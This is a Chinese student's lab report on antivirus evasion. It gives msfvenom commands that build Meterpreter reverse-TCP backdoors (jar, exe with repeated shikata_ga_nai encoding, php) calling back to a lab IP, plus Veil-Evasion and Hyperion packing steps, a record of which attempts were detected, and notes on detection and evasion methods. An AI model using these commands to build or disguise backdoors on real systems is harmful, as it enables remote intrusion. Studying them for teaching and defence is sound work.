20164305 徐广皓 Exp3 免杀原理与实践

• 免杀原理及基础问题回答
• 实验内容
  • 任务一：正确使用msf编码器，msfvenom生成如jar之类的其他文件，veil-evasion，自己利用shellcode编程等免杀工具或技巧
    • 使用msf编码器生成各种后门程序及检测
    • 使用veil-evasion生成后门程序及检测
    • 半手工注入Shellcode并执行
  • 任务二：通过组合应用各种技术实现恶意代码免杀
  • 任务三：用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

一、正确使用msf编码器，msfvenom生成如jar之类的其他文件，veil-evasion，自己利用shellcode编程等免杀工具或技巧

1. msfvenom生成.jar文件

• 生成java后门程序使用命令：

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.80.129 LPORT=4305 x> 4305_backjar.jar

• 扫描结果如下

2. msfvenom生成.exe文件

• 与实验二相同，生成一次编码（端口号做实验的时候打错了o(╥﹏╥)o）

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.80.129 LPORT=6305 -f exe > met-encoded.exe

• 查杀结果：

• 十次编码使用命令

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.80.129 LPORT=6305 -f exe > msf4305.exe

• 查杀结果

3. msfvenom生成php文件

• 生成PHP命令：

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.80.129 LPORT=4305 x> 20164305.php

• 查杀结果

4. 使用veil-evasion生成后门程序及检测

安装veil

sudo apt-get install veil
sudo apt-get upgrade veil

• 然后我遇到群里出现的问题，也尝试了多次更新但是也没效果（如下图）

• 这个问题实际上只需要请将Autolt3文件夹从Programe Files (x86)下移动到Programe Files文件夹下就可以解决。

使用veil

• 打开veil，veil

• 用use evasion命令进入Evil-Evasion

• 进入配置界面，use c/meterpreter/rev_tcp.py

• 输入generate生成文件，接着输入你想要playload名称

• 然后去查杀，结果。。。肯定不行

5. 半手工注入Shellcode并执行

• 这部分我在实验2中就已经做过，详情请见链接。、

• 查杀结果

 

6.加壳自制后门

• 压缩壳

 

• 加密壳

  /usr/share/windows-binaries/hyperion/
  wine hyperion.exe -v sxx_upxed.exe sxx_upxed_Hyperion.exe

任务二：通过组合应用各种技术实现恶意代码免杀

由于懒惰，做本次试验拖了几天，看到很多同学都达到了实验报告中免杀的要求，于是我就按部分同学的制作思路，复现了一下，发现没有成功，具体情况如下

• 我看到了有同学说利用手工shellcode、加密壳和压缩壳实现了免杀，于是我用helloworld的代码试验了一下
• 先编写一个helloworld，然后对其编译生成的exe文件进行压缩、加密、加密压缩的操作

• 然后在主机运行360的情况下，将这些exe文件都拷贝到主机上，发现

• 哦看起来只有压缩壳没啥问题，然后我又把压缩壳放到了网站上查杀了一下

• 虽然还没结束，但这报毒率比真正有毒的PHP文件都高。。。。。
• 那么问题来了，是我用的壳不对吗？然后我又看到有的同学说先用py生成shellcode然后用加密壳就没有被查杀，我有复现了一遍，结果跟前面实验一样。。。。。
• 那看来要不就是我的360太强了，要不就是我的壳有问题。。。。。
• 还有一个问题，我在运行不加壳的c代码，360就自动给我杀了。。。。
• 所以希望有利用半手工shellcode和壳做出免杀程序的同学可以私聊我，教我一下是怎么做出来的（瞻仰大佬）Thanks♪(･ω･)ﾉ

 

实验总结与体会

 

• 实验感想

  不管是通过什么方法，只要用加密壳就一定被杀，只要用反弹连接就会生成meterpreter文件也会被杀，所以只是改变编码顺序并不能避免被杀，真心希望前面做出来的同学教我一下如何被免杀。

• 杀软是如何检测出恶意代码的？

  • 基于特征码
  • 实时监控
  • 基于行为的恶意软件检测

• 免杀是做什么？

  可以实现杀毒软件不发现、扫描不出病毒代码。

• 免杀的基本方法有哪些

  • 改变特征码
    • 加壳
    • shellcode+encoder
    • veil-evasion
    • 半手工化
  • 改变行为
    • 通讯方式
      • 尽量使用反弹式连接
      • 使用隧道技术
      • 加密通讯数据
    • 操作系统
      • 基于内存操作
      • 减少对系统的修改
      • 加入混淆作用的正常功能代码

• 开启杀软能绝对防止电脑中恶意代码吗

  那一定是防不住的，杀毒软件是被动的防护方式，只有恶意代码的更新才会促进杀软的升级